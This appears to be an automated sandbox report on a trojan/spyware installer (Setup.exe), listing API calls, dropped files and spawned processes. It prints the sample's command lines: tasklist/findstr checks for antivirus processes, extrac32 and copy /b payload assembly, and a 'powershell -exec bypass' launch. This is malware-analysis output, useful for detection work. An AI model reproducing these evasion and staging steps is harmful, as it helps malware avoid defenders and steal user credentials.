                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00E1F7C7
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00E1F55C
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E39FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00E39FD2
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E14763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_00E14763
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E01B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00E01B4D
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00E0F20D
                Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\SalvadorJsJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LikedBlackberryJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\WallEndsJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\HornUsedJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC801712_2_00DC8017
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DAE1F012_2_00DAE1F0
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DBE14412_2_00DBE144
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA22AD12_2_00DA22AD
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC22A212_2_00DC22A2
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DDA26E12_2_00DDA26E
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DBC62412_2_00DBC624
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E2C8A412_2_00E2C8A4
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DDE87F12_2_00DDE87F
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DD6ADE12_2_00DD6ADE
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E12A0512_2_00E12A05
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E08BFF12_2_00E08BFF
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DBCD7A12_2_00DBCD7A
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DCCE1012_2_00DCCE10
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DD715912_2_00DD7159
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA924012_2_00DA9240
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E3531112_2_00E35311
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA96E012_2_00DA96E0
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC170412_2_00DC1704
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC1A7612_2_00DC1A76
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC7B8B12_2_00DC7B8B
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DA9B6012_2_00DA9B60
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC7DBA12_2_00DC7DBA
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC1D2012_2_00DC1D20
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DC1FE712_2_00DC1FE7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_047915AD16_2_047915AD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0479165316_2_04791653
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\124531\Designing.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: String function: 00DC0DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: String function: 00DBFD52 appears 40 times
                Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062CF appears 58 times
                Source: Setup.exeStatic PE information: invalid certificate
                Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: Commandline size = 4588
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: Commandline size = 4588Jump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/26@4/3
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E141FA GetLastError,FormatMessageW,12_2_00E141FA
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E02010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00E02010
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E01A0B AdjustTokenPrivileges,CloseHandle,12_2_00E01A0B
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00E0DD87
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E13A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00E13A0E
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsj4CF9.tmpJump to behavior
                Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Designing.com, 0000000C.00000003.2512726298.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2512632876.00000000042BF000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2487418039.00000000042C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Setup.exeVirustotal: Detection: 7%
                Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
                Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Lt
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com z
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 124531Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E LtJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Heater" Lance Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\124531\Designing.com Designing.com zJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comSection loaded: mswsock.dllJump to behavior
